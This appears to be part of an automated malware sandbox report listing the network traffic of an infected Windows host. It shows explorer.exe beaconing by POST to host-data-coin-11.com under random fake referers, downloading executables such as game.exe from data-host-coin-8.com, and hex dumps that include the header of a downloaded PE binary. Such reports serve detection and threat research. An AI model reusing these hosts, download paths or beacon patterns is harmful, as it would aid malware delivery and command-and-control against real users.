                                                                                                                                                        Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        22192.168.2.3497645.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:02.599958897 CET1688OUTGET /files/5376_1640094939_1074.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: data-host-coin-8.com
                                                                                                                                                        Dec 28, 2021 03:23:02.698350906 CET1689INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:02 GMT
                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        23192.168.2.3497655.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:02.796093941 CET1689OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://xrbnvbr.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 209
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:02.919215918 CET1690INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:02 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        24192.168.2.3497675.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:03.444597960 CET1696OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://tckdyenm.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 328
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:03.566232920 CET1698INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:03 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 37I:82OR%@_M-\z.TKC0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        25192.168.2.3497915.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:11.239759922 CET2221OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://iiojucb.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 297
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:11.357532024 CET2222INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:11 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        26192.168.2.3497935.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:11.531095028 CET2225OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://igeku.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 235
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:11.647742987 CET2227INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:11 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        27192.168.2.3497955.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:11.746984959 CET2229OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://iuyeipw.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 264
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:11.885267973 CET2230INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:11 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 2eI:82OO~kEKg2P0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        28192.168.2.34979654.38.220.8580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:12.030267954 CET2231OUTGET /install5.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: unicupload.top
                                                                                                                                                        Dec 28, 2021 03:23:12.048336029 CET2231INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:19 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 178
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        29192.168.2.3497975.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:12.146920919 CET2232OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://xuifp.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 136
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:12.271754026 CET2233INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:12 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        3192.168.2.34985552.216.132.51443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        30192.168.2.3497985.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:12.388907909 CET2233OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://afxqeyx.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 351
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:12.503163099 CET2234INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:12 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        31192.168.2.3497995.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:12.615824938 CET2235OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://hwpbyl.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 155
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:12.732398033 CET2236INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:12 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 3eI:82O@e,YR9?RBpw0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        32192.168.2.3498005.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:14.877996922 CET2237OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://lbhapead.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 368
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:14.991018057 CET2238INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:14 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        33192.168.2.3498015.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:15.089142084 CET2239OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://gvmtgcjw.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 158
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:15.199337959 CET2239INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:15 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 30I:82OR&:UPJ$dP0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        34192.168.2.3498025.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:15.575340986 CET2240OUTGET /game.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: data-host-coin-8.com
                                                                                                                                                        Dec 28, 2021 03:23:15.671561956 CET2241INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:15 GMT
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Content-Length: 342528
                                                                                                                                                        Connection: close
                                                                                                                                                        Last-Modified: Tue, 28 Dec 2021 02:23:02 GMT
                                                                                                                                                        ETag: "53a00-5d42b80299e6c"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c5 98 8d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 fa 03 00 00 20 09 00 00 00 00 00 50 4a 02 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 0d 00 00 04 00 00 93 2b 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c f8 03 00 28 00 00 00 00 a0 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0d 00 18 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ee f9 03 00 00 10 00 00 00 fa 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 10 04 00 00 8c 00 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 67 00 00 00 00 05 00 00 00 00 80 0c 00 00 02 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 69 6c 6f 00 00 00 93 0d 00 00 00 90 0c 00 00 0e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 a0 0c 00 00 64 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 3b 00 00 00 10 0d 00 00 3c 00 00 00 fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c fb 03 00 98 fb 03 00 ac fb 03 00 be fb 03 00 d0 fb 03 00 e6 fb 03 00 f6 fb 03 00 0c fc 03 00 1c fc 03 00 38 fc 03 00 4c fc 03 00 60 fc 03 00 76 fc 03 00 90
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PEL` PJ@P+l(b!p@.text `.dataho@.fig@.hilo@.rsrcbd@@.reloc;<@B|8L`v


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        35192.168.2.3498085.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:17.586924076 CET7932OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ylridfpsql.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 186
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:17.703439951 CET9261INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:17 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
